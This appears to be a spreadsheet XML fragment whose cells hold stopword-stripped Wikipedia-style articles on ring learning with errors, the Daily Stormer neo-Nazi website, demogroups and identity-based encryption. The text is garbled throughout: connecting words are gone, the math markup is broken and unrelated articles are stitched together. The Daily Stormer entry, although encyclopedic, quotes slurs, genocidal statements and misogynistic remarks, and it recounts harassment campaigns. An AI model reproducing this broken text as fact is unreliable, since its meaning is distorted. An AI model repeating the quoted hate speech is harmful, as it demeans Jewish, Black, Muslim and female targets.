[x]/\langle f(x)\rangle ring integer polynomials modulo {\displaystyle f(x)} elements {\displaystyle (i.e., residues modulo {\displaystyle f(x)} typically represented integer polynomials degree less {\displaystyle {\displaystyle q\equiv 1{\bmod {2}}n} sufficiently large public prime modulus (bounded polynomial {\displaystyle {\displaystyle r_{q}=r/\langle q\rangle =\mathbb _{q}[x]/\langle f(x)\rangle ring integer polynomials modulo {\displaystyle f(x)} {\displaystyle elements {\displaystyle r_{q}} represented polynomials degree less {\displaystyle -whose coefficients {\displaystyle \lbrace 0,\dots ,q-1\rbrace above-described ring, r-lwe problem described follows. {\displaystyle s=s(x)\in r_{q}} uniformly random ring element, kept secret. analogously standard lwe, goal attacker distinguish arbitrarily many (independent) ‘random noisy ring equations’ truly uniform ones. more specifically, noisy equations form {\displaystyle (a,b\approx a\centerdot s)\in r_{q}\times r_{q}} uniformly random product {\displaystyle a\centerdot perturbed ‘small’ random error term, chosen certain distribution {\displaystyle they gave quantum reduction approximate worst case) ideal lattices {\displaystyle search version ring-lwe, goal recover secret {\displaystyle s\in r_{q}} (with high probability, {\displaystyle arbitrarily many noisy products. this result follows general outline regev's iterative quantum reduction general lattices, ideal lattices introduce several technical roadblocks ‘algebraic’ ‘geometric’ components reduction. they used algebraic number theory, particular, canonical embedding number field chinese remainder theorem overcome obstacles. they following theorem: theorem {\displaystyle arbitrary number field degree {\displaystyle {\displaystyle \alpha =\alpha (n)\in (0,1)} arbitrary, (rational) integer modulus {\displaystyle q=q(n)\geq {\displaystyle \alpha \centerdot q\geq \omega ({\sqrt {\log n}})} there probabilistic polynomial-time quantum reduction {\displaystyle {\displaystyle dgs_{\gamma {\displaystyle {\mathcal {o}}_{k}} {\displaystyle lwe_{q,\psi \leq \alpha {\displaystyle \gamma =\eta _{\epsilon }(i)\centerdot \omega ({\sqrt {\log n}})/\alpha 2013, guneysu, lyubashevsky, poppleman proposed digital signature scheme based ring learning errors problem. 2014, peikert presented ring learning errors exchange (rlwe-kex) paper, "lattice cryptography internet." this developed work singh. ideal-lwe stehle, steinfeld, tanaka xagawa defined structured variant problem (ideal-lwe) describe efficient public encryption scheme based worst case hardness approximate ideal lattices. this first cpa-secure public encryption scheme whose security relies hardness worst-case instances {\displaystyle {\tilde {o}}(n^{2})} -ideal-svp subexponential quantum attacks. achieves asymptotically optimal efficiency: public/private length {\displaystyle {\tilde {o}}(n)} bits amortized encryption/decryption cost {\displaystyle {\tilde {o}}(1)} operations message (encrypting {\displaystyle {\tilde {\omega }}(n)} bits once, {\displaystyle {\tilde {o}}(n)} cost). security assumption {\displaystyle {\tilde {o}}(n^{2})} -ideal-svp cannot solved subexponential time quantum algorithm. noteworthy stronger standard public cryptography security assumptions. hand, contrary public cryptography, lattice-based cryptography allows security subexponential quantum attacks. most cryptosystems based general lattices rely average-case hardness learning errors (lwe). their scheme based structured variant lwe, call ideal-lwe. they needed introduce techniques circumvent main difficulties arise restriction ideal lattices. firstly, previous cryptosystems based unstructured lattices make regev's worst-case average-case classical reduction bounded distance decoding problem (bdd) (this classical step quantum reduction lwe). this reduction exploits unstructured-ness considered lattices, seem carry structured lattices involved ideal-lwe. particular, probabilistic independence rows matrices allows consider single row. secondly, ingredient used previous cryptosystems, namely regev's reduction computational variant decisional variant, also seems fail ideal-lwe: relies probabilistic independence columns matrices. overcome difficulties, avoided classical step reduction. instead, used quantum step construct quantum average-case reduction (average-case collision-finding problem) lwe. also works ideal-sis ideal-lwe. combined reduction worst-case ideal-svp average-case ideal-sis, obtained quantum reduction ideal-svp ideal-lwe. this shows hardness computational variant ideal-lwe. because obtain hardness decisional variant, used generic hardcore function derive pseudorandom bits encryption. this needed assume exponential hardness svp. fully homomorphic encryption fully homomorphic encryption (fhe) scheme allows computation encrypted data, without first needing decrypt. problem constructing fully homomorphic encryption scheme first forward rivest, adleman dertouzos 1978, shortly invention rivest, adleman shamir.an encryption scheme {\displaystyle \varepsilon =({\mathsf {keygen}},{\mathsf {encrypt}},{\mathsf {decrypt}},{\mathsf {eval}})} homomorphic circuits {\displaystyle {\mathcal {c}}} circuit {\displaystyle c\in {\mathcal {c}}} given {\displaystyle pk,sk\leftarrow {\mathsf {keygen}}(1^{\lambda {\displaystyle y={\mathsf {encrypt}}(pk,x)} {\displaystyle y'={\mathsf {eval}}(pk,c,y)} holds {\displaystyle {\mathsf {decrypt}}(sk,y')=c(x)} {\displaystyle \varepsilon fully homomorphic homomorphic circuits size poly {\displaystyle \operatorname {poly} (\lambda {\displaystyle \lambda scheme's security parameter. 2009, gentry proposed first solution problem constructing fully homomorphic encryption scheme. scheme based ideal lattices. also lattice-based cryptography homomorphic encryption ring learning errors exchange post-quantum cryptography short integer solution problem references</t>
  </si>
  <si>
    <t>Three-pass protocol</t>
  </si>
  <si>
    <t>The Daily Stormer</t>
  </si>
  <si>
    <t>daily stormer american far-right, neo-nazi, white supremacist, misogynist, islamophobic, antisemitic, holocaust denial commentary message board website advocates second genocide jews. part alt-right movement. editor, andrew anglin, founded outlet july 2013, faster-paced replacement previous website total fascism, focused long-form essays fascism, race, antisemitic conspiracy theories. contrast, daily stormer relies heavily quoted material exaggerated headlines.the site known internet memes, likened imageboard 4chan cited attractions younger ideologically diverse audience. while white nationalist authors praised daily stormer's reach, others taken issue content tone, accusing anglin agent provocateur, used discredit true white nationalism.the daily stormer orchestrates calls "troll army", involved internet trolling figures anglin disagrees politically. august 2017, causing outrage insulting victim car-ramming homicide far-right unite right rally, website rejected several domain registrars. august 2019, site went offline temporarily service provider, bitmitigate, cloud infrastructure provider; site found another provider.in june 2019, federal judge ordered anglin $4.1 million comedian dean obeidallah, anglin falsely accused orchestrating manchester arena bombing. july 2019, federal magistrate recommended anglin million tanya gersh, woman whitefish, montana anglin organized targeted harassment campaign. management founder andrew anglin born 1984, grew near columbus, ohio. according anglin childhood classmates, liberal youth. attended linworth alternative program worthington kilbourne high school 1999 2003, remembered dreadlocked vegan. friends high school report behavior changed sophomore year linworth, exhibited self-harming behavior, began promote conspiracy theories. after high school, anglin took classes columbus state community college 2003, studied english ohio state university semester 2004.in 2006, anglin launched conspiracy theory website, outlaw journalism, modeled works alex jones hunter thompson, anglin admired.in 2008, posting outlaw journalism humanity survive return hunter-gatherer lifestyle, anglin began traveling around southeast asia, eventually ending davao city, philippines. 2011, spent several weeks tboli village southern mindanao, initially intended stay permanently, selling possessions raise money dowry marry local muslim women. 2012, anglin wrote found locals civilized, non-aggressive industrious people" eventually came consider "primitive", became lonely wanted associate members race, grace god, found adolf hitler."in 2012, anglin launched another website, adventure quest 2012, discussed conspiracy theories existence reptilian humanoids. described site seeking "mend wounds produced modern society [help] reader transcend physical bonds reach total ascendancy. mend wounds, world must learn embrace diversity color." 2014, stated although agreed central tenets nazism, reservations reintroducing aspects hitler's regime. self-proclaimed "troll", anglin stated introduced nazism online imageboard 4chan. later 2012, launched first neo-nazi website, total fascism. feeling total fascism appealing younger demographic articles long, anglin launched daily stormer july 2013, shorter articles provocative style. anglin said march 2014 spends hours week writing website.anglin's location known. investigative article huffington post november 2016 analyzed social media sources, concluded living germany. rumors also claimed residing russia. july 2017, anglin told residing lagos, nigeria. southern poverty center (splc) lists site headquartered worthington, ohio, activity several states. website registered name anglin's father greg, runs christian-inspired counseling service worthington. finances daily stormer primarily funded donations anglin solicits regularly site visitors. father protested anti-racist action receiving donations site's readers pass son. february 2017, website announced corporate sponsor—smerff electrical, owned simon hickey brisbane, australia, whose website contains images alt-right meme pepe frog. anglin told mother jones received donations silicon valley, santa clara county, california largest source traffic website.the site believed received $200,000 bitcoin contributions since began accepting cryptocurrency 2014. current cryptocurrency wallet consistently kept approximately $80,000 bitcoin hand. money entering spent accounts publicly tracked twitter bot. twitter account supportive stormer announced coinbase deleting accounts persons attempting send bitcoin them; coinbase stated general terms "prohibits account would abuse, harass, threaten, promote violence others". august 2017, example, anglin received donation 14.88 bitcoin, number reference fourteen words, adolf hitler eighth letter, "88" "hh" "heil hitler"). time, worth $60,000, anglin kept entire amount, would worth $235,000 year.the daily stormer company called moonbase holdings, anglin saying chose name donors could avoid scrutiny credit card companies. company made $3,400 month alt-right crowdfunding website hatreon, ceased operations february 2017. defamation lawsuit anglin, muslim american radio personality dean obeidallah requested moonbase holdings scrutinized find individuals connections company. content reception daily stormer takes name nazi party's tabloid newspaper stürmer, known virulently antisemitic caricatures jews semi-pornography involving jews raping young aryan girls. publisher, julius streicher, executed second world crimes humanity.the southern poverty center described site "the newest comer heated competition rule hate web", "has last months march 2015] often topped oldest largest hate site web, stormfront, terms reach page views, based alexa data". anglin claimed 2016 website's traffic doubled last months, peaking 120,000 daily visitors. website part alt-right movement, calls "the world’s most visited alt-right website". movement made headlines mid-2016, "bolstered part unexpected rise donald trump britain's decision leave european union", anglin declared: meme war; we've taken gop, very, quickly." unlike figures milo yiannopoulos, anglin play extremist elements alt-right, stating that: "the goal ethnically cleanse white nations non-whites establish authoritarian government. many people also believe jews exterminated".andrew anglin uses daily stormer platform promote misogynistic conspiracy theories, claiming politically active "[w]hite women across western world" pushing liberal immigration policies ensure endless supply black arab satisfy depraved sexual desires." july 2018, anglin summarized misogynistic views, writing: "look, hate women. think deserve beaten, raped locked cages." content style anglin asserts purpose daily stormer provide means propagandize people look world certain way". headlines include "all intelligent people history disliked jews", "adolf hitler: most lied about time". site bills "america's most-trusted republican news source". according jewish chronicle, daily stormer "posts hundreds racist articles targeting black people, arabs jews". website offers pro-separatist coverage conflict eastern ukraine, anglin considers "the correct moral position". site promotes conspiracy theory jews shape shifting reptilians rule earth, anglin previously discussed site adventure quest 2012.the splc stated daily stormer owed success online imageboard 4chan becoming popular among racists, websites similar memes rhetorical styles. meme website used overlay photographs taylor swift anti-semitic quotations, including comments made hitler. website puts triple parentheses around names jews, far-right meme created fellow website right stuff. jacob siegel daily beast wrote website growing popularity amongst younger audience humor, attracting activists anti-political correctness ideologies—such gamergaters, men's rights activists opponents social justice warriors—who would usually identify fascism. splc also documented anglin's involvement encouragement culture jamming making hyperbolic statements fake online accounts women minorities. also said "ridiculous" statements "gas kikes", repeated media coverage, work desensitize public holocaust. also believes extreme right-wing rhetoric normalize less extreme right-wingers trump. december 2017, huffington post leaked anglin's 17-page style guide website, included guideline articles must extremely hyperbolic readers would unsure whether content parody.the hacker internet troll known "weev" (andrew alan escher auernheimer) wrote article website release prison october 2014, espousing conversion neo-nazism opposition jews built empire wickedness likes world never seen". fredrick brennan, founder online community 8chan, wrote article daily stormer encouraging eugenics, based experiences brittle bone disease. florida-based jewish troll joshua ryne goldberg, encouraged 2015 attack free speech exhibition garland, texas, alias muslim extremist, wrote white supremacist articles daily stormer pseudonym michael slay. daily stormer accepts freelance work pays $14.88 reference david lane's fourteen words nazi slogan "heil hitler") article. second-most prolific writer website goes pseudonym "zeiger" unmasked 2018 montreal gazette gabriel sohier chaput, consultant rosemont–la petite-patrie, quebec. gabriel sohier-chaput also member now-defunct neo-nazi online forum iron march supporter terrorist organization atomwaffen division writing articles promoting group. another notable prolific writer robert warren "azzmador" ray, east texas-based neo-nazi gained national prominence appearance vice news documentary elle reeve charlottesville riots complained charlottesville "jewish communists criminal niggers". also creator krypto report, main podcast show daily stormer. recently-known associate/member daily stormer daniel kenneth jeffries granbury, texas goes nickname "grandpa lampshade" reference world rumour nazis made lampshades executed holocaust prisoners) hosts "thoughts day" segment united kingdom-based neo-nazi radio network radio aryan founded steve "sven longshanks" stone, laurence "max musson" nunn, jeremiah "jez" bedford-turner radio prominently featured daily stormer. some jeffries/lampshade's posts also shared robert bowers, pittsburgh synagogue shooter domestic terrorist.the daily stormer attracted media coverage splc stated white supremacist spree killer dylann roof—who june 2015, shot nine african americans death charleston church shooting—may made several comments site. splc found similarities user's comments roof's manifesto. daily beast stated anglin "repudiated roof's crime publicly disavowed violence, endorsing many roof's views". october year, anglin gave positive reaction attempted assassination henriette reker, pro-immigration candidate mayor german city cologne, decrying "feminist hag".in 2017, "weev" first non-english version daily stormer, daily stormer spanish. focused news related white nationalism spain latin america. daily stormer sites identity victim manada spread. december 2018, three admins site arrested national police spain fourth member identified. support donald trump anglin officially endorsed donald trump president 2015. anglin encouraged website's readers "vote first time lives actually represents interests". website also received national international coverage endorsement trump's proposal temporary moratorium admitting foreign muslims country; proclaimed "heil donald trump ultimate savior". according splc, white supremacist endorsement trump unprecedented, movement generally skeptical politicians. july 2016, andrew anglin daily stormer mentioned lacy clay, democratic representative missouri, asked congressional hearing whether director james comey aware trump sharing twitter posts white supremacists. anglin wrote july 2016 believed trump pragmatic anti-semite praised israel votes evangelical christians, dropping subtle hints purported jewish domination rival hillary clinton's campaign. huffington post journalist jessica schulberg compared white nationalists like anglin former klux klan leader david duke believed trump representative ethnic interests, time several jews believed representative theirs.in daily telegraph, trump supporter crystal wright wrote candidate needed separate white nationalists daily stormer, endorsing ahead politicians deemed "cuckservatives" holding liberal positions. writing atlantic, conor friedersdorf theorized modern academia's focus race rather "color-blind" individualism causing divisions allowing white nationalist sites daily stormer gain audience, therefore become "tiny nevertheless alarming portion" trump's support. jazeera writer malcolm harris analyzed endorsement predicted trump presidency would strengthen organized racist groups lead civil war.after trump 2016 u.s. presidential election, anglin called site's readers non-violent intimidation make "brown people" feel unwelcome america, goad disappointed supporters clinton committing suicide.in response bombing syrian government's shayrat airbase 2017, daily stormer several alt-right outlets criticized trump. while anglin alleged president could control purportedly jewish deep state, daily stormer associate "weev" said video website retained faith trump past actions. reaction white nationalists white nationalist websites stormfront counter-currents taken issue lowbrow coverage daily stormer, well anglin's defense christianity denunciation white supremacist group christian identity. kyle rogers council conservative citizens also criticized website reprinting material. anglin also criticized relationships filipinas, insults towards white women website.colin liddell alternativeright.com criticized anglin's beliefs tone. liddell, believes stopping migration encouraging higher birthrates important preserving white race, condemned anglin writing impossible race survive without adopting views jews, hitler holocaust. liddell considered anglin attracting poor whites provocative online persona manner monster trucks professional wrestling, writing hard conclude anglin paid shill agent provocateur, whose purpose simply infest discredit white nationalism". jared taylor american renaissance criticized daily stormer's "extremely harsh, dismissive insulting tone toward blacks", called unhelpful.others, traditionalist youth network, praised daily stormer reach influence. anglin's extreme tone white nationalists suspect undercover jew, accusation finds analogous believing jewish lgbt activist allen ginsberg undercover nazi. support china anglin endorsed jinping, praising china's action promote virility among censoring feminists lgbt accounts internet, condemned several american conservatives shilling china article "what about china, then?" published october 2021. articles, according foreign policy magazine, anglin's daily stormer articles regularly praised china actions uighur muslims. 2022 buffalo shooting payton gendron, suspect 2022 mass shooting buffalo, york, cited daily stormer inspired attack, addition 4chan writings zealand mass shooter brenton tarrant. activities harassment "troll army" luciana berger daily stormer orchestrates calls "troll army", involved internet trolling. came attention october 2014 campaign british labour politician luciana berger, jewish member parliament. member neo-nazi group national action sent prison sending abusive messages twitter, daily stormer encouraged readers send antisemitic messages, long promote violence. also gave guidelines limit traceability create anonymous e-mail twitter accounts. berger said received abusive messages week. abuse brought british parliament, speaker john bercow deemed "beneath contempt". mariam veiszadeh troll army launched campaign february 2015 mariam veiszadeh, afghan australian muslim activist demanded t-shirt bearing australian flag reading love leave" withdrawn sale woolworths. woman arrested sending abusive messages, anglin interpreted veiszadeh's actions curbing freedom speech, believed "should responded ridiculous conceivable hateful speech". alex jones breitbart "troll army" also attacked right-wing conspiracy theorist alex jones jewish wife. november 2015, took part "operation: kikebart", targeting far-right news website breitbart news opening office israel. post much anti-semitic content comments section would unfeasible moderate. disqus, comment platform used websites including breitbart, ended service daily stormer result. alison rapp 2016, daily stormer took part gamergate-related attempt nintendo marketing officer alison rapp fired; nintendo dismissed stated unrelated controversy. julia ioffe later 2016, site encouraged racially abusing julia ioffe, russian-jewish journalist written piece trump's wife, melania trump, magazine. melania trump daily stormer found piece critical. ioffe said abuse unparalleled lifetime since leaving russia escape prejudices years earlier. erin schrode june 2016, users website revealed personal details erin schrode, jewish woman running congress california, sent holocaust-related messages. tanya gersh southern poverty center filed lawsuit april 2017 behalf montana jewish resident tanya gersh, anglin daily stormer, alleging invaded privacy caused "intentional infliction emotional distress" upon gersh, also violated montana's anti-intimidation act. website initiated "troll storm" response gersh's alleged extortion property belonging mother white nationalist richard spencer. gersh denies allegations. site crowdfunded $152,000 legal fees around 2,000 contributors hired first amendment lawyer marc randazza, whose previous clients include 8chan right-wing author mike cernovich. suit difficulties anglin's secrecy location. november, federal judge ruled gersh public figure, anglin intentionally incited readers harass gersh, harassment protected free speech. gersh testified lawsuit, therapist, describe effects continued harassment "troll army". anglin appear hearing, despite ordered trial judge, saying feared safety; presumed outside united states. appearing, forfeited legal right defend actions.on july 2019, federal magistrate overseeing trial recommended gersh receive default judgment million, million compensatory damages, million punitive damages. magistrate also recommended anglin forced remove posts encouraging harassment gersh daily stormer website. august magistrate's recommendations approved u.s. district court judge. david dinielli, deputy legal director splc, said organization would ends earth collect judgment behalf client, tanya gersh, whether cash, assets intellectual property. employ various procedures obtain assets seized, anglin full million judgment. monetary hard assets insufficient, intangible property." according anglin's lawyer time, longer represents him, anglin currently u.s. resident. dean obeidallah august 2017, muslim american radio presenter dean obeidallah sued daily stormer ohio federal court. anglin published fake images purported show obeidallah celebrating 2017 manchester arena bombing. lawsuits cleared longstanding hurdle march 2018, u.s. magistrate judge jeremiah lynch declared sufficient evidence anglin domiciled ohio despite living abroad. july, court found obeidallah's favor, neither anglin representatives present court. taylor dumpson taylor dumpson, first black student body president american university, sued anglin 2018 organizing racist sexist trolling campaign her. alleges anglin posted name picture, well links facebook page twitter account university's student government, urged readers "troll storm" her, resulted many hate-filled racist online messages directed her. although dumpson anglin reached settlement, settled december 2018 people harassed her, eugene, oregon named evan mccarty neo-nazi musician former theatre actor known "byron vandal" (named byron beckwith, assassin medgar evers) served member fascist vanguard america affiliated daily stormer. mccarty required apologize, renounce white supremacy, stop trolling doxing online, provide information cooperate authorities prosecution white supremacists. lawsuit brought behalf lawyers' committee civil rights under continues litigation tool fight extremism slow efforts white supremacists.on august 2019, federal judge awarded dumpson judgment $725,000, paid andrew anglin, brian andrew ade, shell company owns daily stormer. defendants show contest lawsuit, default judgment entered them, consisting $101,429.28 compensatory damages, punitive damages $500,000 attorney's fees costs $124,022.10. restraining order also handed down, injunction publish anything dumpson. judgement comes tanya gersh awarded million default judgment anglin. distribution propaganda 2016, daily stormer hacker "weev" jointly took credit sending copies racist, anti-semitic flier thousands publicly accessible, internet-connected printers throughout country, many universities. flier urged reader visit website accompany struggle global white supremacy". anglin credited "weev" printer exploit, daily stormer crew composed flier's text. april year, anniversary adolf hitler's birth, university printers germany hacked publish nazi propaganda tracts including website's name. that year, daily stormer expanded activities establish "clubs".the daily stormer capitalized popularity augmented reality video game pokémon mid-2016 distribute racist flyers children congregating public play game, anglin explaining long thought needed pre-teens involved movement. age, really brainwash someone easily. anyone accepts nazism going nazi life." 2017, deadly stabbing attack university texas, racist flyers posted across campus website address daily stormer, caricature black person, line "... around blacks never relax!". site hosting issues 2017 unite right rally daily stormer promoted readers' participation unite right rally, far-right rally charlottesville, virginia august 2017, counter-protester, heather heyer, killed vehicular ramming attack. "weev" called readers daily stormer locate attend heyer's funeral, calling "fat skank". both anglin "weev" denied heyer died vehicular impact, claiming instead killed weight-related heart attack.on august website informed domain registrar godaddy violated terms service mocking heyer article anglin. given hours locate registrar site. next moved google almost immediately cancelled registration violation terms, also terminating website's youtube account. following day, website registered tucows, canceled hours later regularly inciting violence. august announced "weev" site moved dark web, accessible tor, facebook banned links site discord banned server. august cloudflare, provider proxy service used protect daily stormer, also terminated service. cloudflare previously refused terminate sites based content, matthew prince made exception, posting public announcement explanation company's blog. daily stormer receives ddos protection content distribution network march 2017, bitmitigate. company's founder, nick lim, said found daily stormer "stupid" believed freedom expression. several twitter accounts connected daily stormer also suspended.on august relocation dailystormer.ru, russian media watchdog roskomnadzor requested shutdown domain. daily stormer briefly returned clearnet .lol gtld, dailystormer.lol, administered namecheap, days, namecheap canceled domain. company's richard kirkendall stated "the quality context material, paired support violent groups causes passes protected free speech incitement", specifically quoting published statement daily stormer: take ph.d. mathematics understand white pride organization jews stuffed ovens."the site returned punishedstormer.com august hosted dreamhost, whose clients include far-right national vanguard northwest front. denial-of-service attacks anonymous caused intermittent outages dreamhost's sites, including unconnected white supremacist ideology. within hours attack, dreamhost canceled site's accounts violating terms service, saying host already kicked site years previously exploiting automated sign-up process. days later, daily stormer available albanian cctld, dailystormer.al. within four days, removed registrar host.al breaking content rules. september, daily stormer briefly registered address austria, removed registrar nic.at local politicians complained. later month, reappeared domain iceland, country known freedom speech; anglin said recent collapse nordic island's government meant politicians would distracted affairs related website. before september, isnic pulled daily stormer anglin refused standard condition disclosing address, fearing information would passed agencies. from september october daily stormer hosted .cat domain, exclusively reserved websites promoting catalan language culture. exploited weakened filters spanish government raided offices registrar fundació puntcat amidst political crisis, published several pieces support catalan independence. november 2017, daily stormer registered domain hong kong, revoked month.on november 2017, site returned clear .red domain name, registered gkg.net. domain kept website online seized registrar. hours domain seized, site registered .top website, registrar previously used .red. .top domain lasted february 2018, taken offline registrar. february 2018, daily stormer registered domain .name china-based internet company eranet international limited. reaction domain blocking internet providers raised questions regarding implications domain registrants policing internet. august cancellation rebel media's registration hours' notice compared daily stormer, provided coverage sympathetic charlottesville protesters.the electronic frontier foundation acknowledged companies within legal rights terminate contracts daily stormer, said move dangerous precedent political views, including left-wing ones, could denied legal protection. several news outlets also published editorials discussing free speech implications move.as august daily stormer returned dark network. this prompted announcement project team "disgusted" website, powerless intervene. references external links official website</t>
  </si>
  <si>
    <t>Demogroup</t>
  </si>
  <si>
    <t>demogroups teams demosceners, make computer based audio-visual works known demos. demogroups form subculture collectively known demoscene. groups frequently consist students, young computer enthusiasts spend days coding demos. they often pseudonym (called "handle" "nick"), usually chained together name group formats like "scener demo group" "scener/dg"). demosceners rarely real names demoscene contexts. this tradition originating demoscene's roots, small demos distributed along cracked software, usually computer games. many demogroups founded friends already knew real life. however, also groups taken form online bulletin board systems internet. perhaps important demogroups communicate irc. demosceners different groups also meet real life demoparties smaller meetings. demogroups often bear resemblances corporate companies: demogroups incorporate wordmarks, logos, catchphrases, slogans promotion. important demogroup good major groups dedicated group organisers responsible "managing group's human resources", i.e. members slack off. some groups also treat recruitment members great care, often applying "trial periods" member prove themself worthy. however practices often intentional exaggeration (often tongue-in-cheek), maintain "elite" image group. group perhaps important social unit demoscene, belonging group often considered less synonymous demoscener. even individual productions, group activity involved, typically associated group creative individual. there even several "one-man groups" individual demomaker group wanted release demo intro. demography 2006, countries active demogroups demoparties nordic countries (norway, sweden, finland, denmark), germany, netherlands, hungary france. community-like nature demoscene, multi-national demogroups uncommon. demoscener functions demosceners specialize various categories able take part demomaking process. people able cross multiple archetypes (e.g. coder-musician, musician-designer), means trend. coder coder demogroup's programmer creates demo's software framework responsible actual realtime state demo. while coders specialize developing system-level functionality (such providing wrappers apis coders base code on), others code effects usually visual representations mathematical formulas, fractals metaballs. 1990s, coders often entirely responsible demo's flow arrangement, including effect's synchronization music sometimes even design. nowadays, software tools known demotools widely used, allowing work done designer coder. many groups, however, still prefer coder takes responsibility demomaking process, including design. many cases, attempt excelling several areas resulted area outshadowing others: instance, coders make music often come "coder music" technically passable lacks artistic ambitions. "coder graphics" "coder palettes" similar terms graphics color schemes. graphic artist graphic artists graphicians scene lingo) create visual coherency behind demo, include still pictures, design elements, fonts, colors, objects, textures animation. originally, single type graphician creating typical graphics (referred pixeled graphics typically created pixel pixel). ever since demos started using complex much elaborate cubes donuts) graphics, graphicians exclusively model graphics also around, sometimes referred (3d) modelers. musicians musicians responsible composing, arranging, mixing mastering (and cases, performing) soundtracks sound effects demo. older days, musicians worked trackers, world tracked music heavily dominated demoscene musicians. later times, became possible demos streaming, high-quality music formats, musicians started gradually change tools professional music sequencers. however, tracked music specialized formats still continue used size-restricted intros well demos written restrictive platforms mobile devices vintage computers. fake groups demosceners often form fake groups, essentially secret identities making humorous vulgar productions without scathing original reputation people fake group hide behind pseudonym (which, considering demoscene handles, usually becomes pseudo-pseudonym). this type masquerading often performed confuse naïve newcomers scene; fake identities never revealed time activity, cases large portion unrelated people aware real persons behind spoof. "one-man" groups though strictly "demogroups" definition, scene always various individuals excelled areas demomaking; rather gathering various persons creative process, programming, music making visual themselves. while obvious disadvantage type working multiple amount work must given quality standard, one-man groups usually point others work gets discussions creative differences alike, actually free working. one-man groups usually treated respect curiosity within scene, they're extremely common phenomenon, scene marks unnecessary effort virtuosity, largely virtually impossible perform average areas one-man demos intros usually bear obvious lacks given areas, depending whether creator coder, graphician musician, adapted skillsets later. perhaps successful one-man army demoscene dmitry "and" andreev, two-time winner assembly demo party intro category. also social group warez group references williams, jeremy. "demographics: behind scene". mindcandy volume demos. retrieved 2012-05-19. tasajärvi, lassi (2004). demoscene: real-time. evenlake studios. isbn 952-91-7022-x. yleisradio (2010). "demoscene-dokumentti" finnish). retrieved august 2014. external links demogroups demozoo demogroups pouët http://www.demoscene.info/demogroups/</t>
  </si>
  <si>
    <t>Identity-based encryption</t>
  </si>
  <si>
    <t>id-based encryption, identity-based encryption (ibe), important primitive id-based cryptography. type public-key encryption public user unique information identity user (e.g. user's email address). this means sender access public parameters system encrypt message using e.g. text-value receiver's name email address key. receiver obtains decryption central authority, needs trusted generates secret keys every user. id-based encryption proposed shamir 1984. however able give instantiation identity-based signatures. identity-based encryption remained open problem many years. pairing-based boneh–franklin scheme cocks's encryption scheme based quadratic residues solved problem 2001. usage identity-based systems allow party generate public known identity value ascii string. trusted third party, called private generator (pkg), generates corresponding private keys. operate, first publishes master public key, retains corresponding master private (referred master key). given master public key, party compute public corresponding identity combining master public identity value. obtain corresponding private key, party authorized identity contacts pkg, uses master private generate private identity result, parties encrypt messages verify signatures) prior distribution keys individual participants. this extremely useful cases pre-distribution authenticated keys inconvenient infeasible technical restraints. however, decrypt sign messages, authorized user must obtain appropriate private pkg. caveat approach must highly trusted, capable generating user's private therefore decrypt sign) messages without authorization. because user's private generated third party's secret, system inherent escrow. number variant systems proposed remove escrow including certificate-based encryption, secure issuing cryptography certificateless cryptography. steps involved depicted diagram: protocol framework boneh matthew franklin defined four algorithms form complete system: setup: this algorithm time creating whole environment. master kept secret used derive users' private keys, system parameters made public. accepts security parameter {\displaystyle \textstyle (i.e. binary length material) outputs:a {\displaystyle \textstyle {\mathcal {p}}} system parameters, including message space ciphertext space {\displaystyle \textstyle {\mathcal {m}}} {\displaystyle \textstyle {\mathcal {c}}} master {\displaystyle \textstyle k_{m}} .extract: this algorithm user requests private key. note verification authenticity requestor secure transport {\displaystyle \textstyle problems protocols deal. takes input {\displaystyle \textstyle {\mathcal {p}}} {\displaystyle \textstyle k_{m}} identifier {\displaystyle \textstyle id\in \left\{0,1\right\}^{*}} returns private {\displaystyle \textstyle user {\displaystyle \textstyle encrypt: takes {\displaystyle \textstyle {\mathcal {p}}} message {\displaystyle \textstyle m\in {\mathcal {m}}} {\displaystyle \textstyle id\in \left\{0,1\right\}^{*}} outputs encryption {\displaystyle \textstyle c\in {\mathcal {c}}} decrypt: accepts {\displaystyle \textstyle {\displaystyle \textstyle {\mathcal {p}}} {\displaystyle \textstyle c\in {\mathcal {c}}} returns {\displaystyle \textstyle m\in {\mathcal {m}}} correctness constraint order whole system work, postulate that: {\displaystyle \forall m\in {\mathcal {m}},id\in \left\{0,1\right\}^{*}:\mathrm {decrypt} \left(\mathrm {extract} \left({\mathcal {p}},k_{m},id\right),{\mathcal {p}},\mathrm {encrypt} \left({\mathcal {p}},m,id\right)\right)=m} encryption schemes efficient identity-based encryption schemes currently based bilinear pairings elliptic curves, weil tate pairings. first schemes developed boneh matthew franklin (2001), performs probabilistic encryption arbitrary ciphertexts using elgamal-like approach. though boneh-franklin scheme provably secure, security proof rests relatively assumptions hardness problems certain elliptic curve groups. another approach identity-based encryption proposed clifford cocks 2001. cocks scheme based well-studied assumptions (the quadratic residuosity assumption) encrypts messages time high degree ciphertext expansion. thus highly inefficient impractical sending shortest messages, session symmetric cipher. third approach lattices. identity-based encryption algorithms following lists practical identity-based encryption algorithms boneh–franklin (bf-ibe). sakai–kasahara (sk-ibe). boneh–boyen (bb-ibe).all algorithms security proofs. advantages major advantages identity-based encryption scheme finite number users, users issued keys third party's secret destroyed. this take place system assumes that, issued, keys always valid basic system lacks method revocation). majority derivatives system revocation lose advantage. moreover, public keys derived identifiers, eliminates need public distribution infrastructure. authenticity public keys guaranteed implicitly long transport private keys corresponding user kept secure (authenticity, integrity, confidentiality). apart aspects, offers interesting features emanating possibility encode additional information identifier. instance, sender might specify expiration date message. appends timestamp actual recipient's identity (possibly using binary format like x.509). when receiver contacts retrieve private public key, evaluate identifier decline extraction expiration date passed. generally, embedding data corresponds opening additional channel sender authenticity guaranteed dependency private identifier. drawbacks private generator (pkg) compromised, messages protected entire lifetime public-private pair used server also compromised. this makes high-value target adversaries. limit exposure compromised server, master private-public pair could updated independent pair. however, introduces key-management problem users must recent public server. because private generator (pkg) generates private keys users, decrypt and/or sign message without authorization. this implies systems cannot used non-repudiation. this issue organizations host willing trust system administrators require non-repudiation. issue implicit escrow exist current system, wherein private keys usually generated user's computer. depending context escrow seen positive feature (e.g., within enterprises). number variant systems proposed remove escrow including certificate-based encryption, secret sharing, secure issuing cryptography certificateless cryptography. secure channel user private generator (pkg) required transmitting private joining system. here, ssl-like connection common solution large-scale system. important observe users hold accounts must able authenticate themselves. principle, achieved username, password public pairs managed smart cards. solutions rely cryptographic techniques insecure code breaking quantum computer attacks (see shor's algorithm) also id-based cryptography identity-based conditional proxy re-encryption attribute-based encryption references external links seminar 'cryptography security banking'/'alternative cryptology', ruhr university bochum, germany 5091 ietf defining common algorithms role-based encryption pairing-based crypto lounge voltage security network encryption service analyst report cost versus</t>
  </si>
  <si>
